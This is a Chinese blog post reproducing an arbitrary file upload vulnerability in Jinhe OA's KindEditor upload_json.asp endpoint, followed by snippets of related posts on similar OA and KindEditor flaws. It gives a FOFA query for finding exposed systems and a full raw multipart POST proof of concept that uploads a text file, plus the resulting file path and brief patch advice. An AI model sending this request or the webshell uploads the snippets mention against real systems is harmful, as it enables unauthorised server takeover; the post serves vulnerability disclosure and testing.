金和OA upload_json.asp存在任意文件上传漏洞

最新推荐文章于 2024-01-09 15:00:39 发布
最新推荐文章于 2024-01-09 15:00:39 发布
阅读量660 收藏 5
点赞数 10
分类专栏: 漏洞复现 文章标签: json 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/135372385
版权

产品简介

金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统升开发平台,电子政务一体化平台智慧电商平合等服务

漏洞概述

金和OA upload_json.asp存在任意文件上传漏洞,攻击者可通过此漏洞获取服务器权限。

指纹识别

fofa:

app="金和网络-金和OA"

漏洞利用

poc:

POST /c6/KindEditor1/asp/upload_json.asp?dir=file HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Length: 338
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------153857212076213662067051609723

-----------------------------153857212076213662067051609723
Content-Disposition: form-data; name="localUrl"


-----------------------------153857212076213662067051609723
Content-Disposition: form-data; name="imgFile"; filename="hhh.txt"
Content-Type: image/png

hhh
-----------------------------153857212076213662067051609723--

在这里插入图片描述
访问返回包给的url

/c6/KindEditor1/asp/../attached/file/20240103/20240103164534323432.txt

在这里插入图片描述

修复建议

更新至最新安全版本

【红豆生南国,春来发枝冬凋敝,相思不如不相思。】

3tefanie
关注
专栏目录
OA C6 upload_json接口任意文件上传
weixin_43567873的博客
03-07 44
OA C6 upload_json接口任意文件上传
OA C6 FileDownLoad.aspx 任意文件读取漏洞复现
最新发布
0xSec
05-09 778
OA C6 FileDownLoad.aspx接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
OA C6 upload_json 任意文件上传漏洞
Keepb1ue的博客
01-09 600
和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。OA C6 upload_json接口处存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限。
asp 调用php上传图片,asp 版 本地图片上传问题!
weixin_35682010的博客
03-24 185
真的很简单~ 就是两个 点点 的问题~:( 真当是 人不学不知义 啊~:)为了让和我一样笨笨的人能节省些 宝贵的时间打麻将~:)我把 简单的代码贴出来~:)KE.show({id : 'content',imageUploadJson : '/admin/kindeditor/asp/upload_json.asp?spath=info/images',fileManagerJson :...
[应用漏洞]KindEditor<=4.1.5 文件上传漏洞利用
不忘初心,护天下安全!
07-23 2634
一、KindEditor KindEditor是一套开源的在线HTML编辑器,主要用于让用户在网站上获得所见即所得编辑效果 二、漏洞介绍 影响版本:KindEditor3.5.2~4.1 简介:Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持 Java、.NET、PHP、ASP等程序。 漏洞存在证明: 根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_jso...
[渗透]kindeditor4.1.5文件上传漏洞
热门推荐
胖胖的ALEX
03-04 1万+
漏洞等级:高危 Kindeditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。 漏洞描述: Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持 Java、.NET、PHP、ASP...
kindeditor在服务器上上传图片显示叉叉,什么原因?,kindeditor<=4.1.5 文件上传漏洞利用...
weixin_26820341的博客
08-11 1196
kindeditor<=4.1.5 文件上传漏洞 - Kindeditor <=4.1.5 file upload vulnerabilityanduse漏洞存影响版本:小于等于4.1.5的kindeditor 编辑器漏洞影响:上传任意. txt 和. html 文件漏洞存在动态脚本语言:php/asp/jsp/asp.net漏洞存在的证明文件:upload_json.* 具体...
通达OA get_datas.php前台sql注入-可获取数据库session登入后台漏洞复现 [附POC]
薛定谔嘚喵博客
11-08 737
攻击者通过对某OA系统进行代码审计,找到get_datas.php文件中执行sql语句的变量处于可控状态。并可以通过此漏洞获取在线用户的Session值。通过构造绕过特殊的sql注入语句,对在线用户Session记录进行任意查询。利用该漏洞可以实现任意用户登录。配合任意文件上传漏洞,上传webshell。
OA C6 UploadFileEditorSave.aspx 文件上传漏洞复现
0xSec
01-03 1171
OA C6系统UploadFileEditorSave.aspx接口处存在任意文件上传漏洞,未经身份认证的攻击者可利用此漏洞上传恶意后门文件,最终可导致服务器失陷。
OA jc6 ntko-upload 任意文件上传漏洞复现
0xSec
01-02 1389
OA jc6系统/jc6/ntkoUpload/接口处存在任意文件上传漏洞,未经身份认证的攻击者可利用此漏洞上传恶意后门文件,最终可导致服务器失陷。
ASP中配置Kindeditor上传图片选择添加水印功能
qianjin_40的博客
11-15 1281
近日,升级了网站的editor,使用Kindeditor在做图片上传时写了一个小程序,可以自动添加水印,具体的代码也是在网络上找到的,刚好可以并用。以下是一些经验分享,希望能与大家交流,互相进步。   首先,配置好上传的路径,选择好程序语言,我使用的是ASP,比较落后吧!   第二步:修改plugins下的image/image.js,找到本地上传框代码: '',
KindEditor 文件上传漏洞漏洞
mei_13的博客
07-31 1万+
1 漏洞简介 1.1 漏洞描述 KindEditor是一套开源的HTML可视化编辑器,使用JavaScript编写,支持aspaspx、php、jsp,几乎支持了所有的网站,该编辑器主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器,非常适合在CMS、商城、论坛、博客、Wiki、电子邮件等互联网应用上使用。且该编辑器支持上传功能,如果上传文件类型控制的不好,那么我们就能利用该漏洞,上传doc,docx,xls,xlsx,ppt,h
KindEditor文件上传漏洞(CVE-2018-18950)
m0_65150886的博客
01-03 2702
漏洞存在于小于等于kindeditor4.1.5 编辑器里,你能上传.txt和 .html文件,支持php/asp/jsp/asp.net。/php/upload_json.php文件不会清理用户输入或者检查用户是否将任意文件上传到系统。通过构造一个恶意的 html文件来实现跳转,钓鱼等,恶意攻击者可实现。1.直接删除upload_json.和file_manager_json.即可。​​​​​​​6.访问html文件如下。7.抓包,上传txt文件,获取返回路径。8.访问上传文件,发现成功上传。
网站安全检测被 提示该网站内容被禁止访问
网站安全专家
05-11 1795
很多建站公司都在使用Kindeditor开源的图片上传系统,该上传系统是可视化的,采用的开发语言支持aspaspx、php、jsp,几乎支持了所有的网站可以使用他们的上传系统,对浏览器的兼容以及手机端也是比较不错的,用户使用以及编辑上传方面得到了很多用户的喜欢。 前端时间我们SINE安全对其进行全面的网站漏洞检测的时候发现,Kindeditor存在严重的上传漏洞,很多公司网站,以及事业单位的网...
改造kindeditor支持asp.net core mvc上传文件
FG7313的博客
09-28 269
kindtor默认使用的上传方法是使用目录下面的一般处理程序upload_json.ashx,暂时还不支持asp.net core下的文件上传,下面放出的自定义处理上传文件的接口方法。 自定义接收上传文件的action替换一般处理程序 代码如下: public class FileController : Controller { private r...
编辑器漏洞(配合文件上传等)
guanjian_ci的博客
03-23 5947
编辑器分类:ewebeditor、kindeditor、ckeditor、fckeditor、Cute Editor、ueditor、southidceditor等等 一、ewebeditor编辑器(数据库路径、文件上传、目录遍历、SQL注入等) (1)漏洞1 Admin_Login.asp 登录页面 Admin_Default.asp 管理首页 Admin_Style.asp 样式页面 Admin_UploadFile.asp 上...
常见编辑器的漏洞利用
weixin_43352659的博客
01-07 1683
常见编辑器的漏洞利用 kindeditor编辑器 kindeditor 4.1 文件上传漏洞(中危、不能拿shell) 1、漏洞问题: Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件且上传文件地 址通常携带“/kineditor/“的关键字。 找到对应/kindeditor/目录访问kind...
asp/php/asp.net网站后台HTML编辑器eWebEditor升级kindeditor编辑器
weixin_46096438的博客
07-12 892
asp/php/asp.net网站后台HTML编辑器eWebEditor升级kindeditor编辑器
asp网站后台里嵌入kindeditor在线编辑器问题
08-20 1677
IFRAME ID="kindeditor1" SRC="kindeditor/asp/demo.asp?id=nr&style=standard" FRAMEBORDER="0" SCROLLING="no" WIDTH="550" HEIGHT="350">IFRAME> 位置换一下 " /> input 在前面,你先这样试一下,如果还不行,那就是你后台的Asp代码有问题了。 换成下面的。
oa jc6 ntko-upload 任意文件上传漏洞
01-16
然而,OA JC6和NTKO-Upload存在一个任意文件上传漏洞。该漏洞可能会被恶意攻击者利用,上传恶意文件,从而对系统造成潜在的安全风险。 恶意上传的文件可能包含恶意代码、病毒或其他有害的文件,攻击者可通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值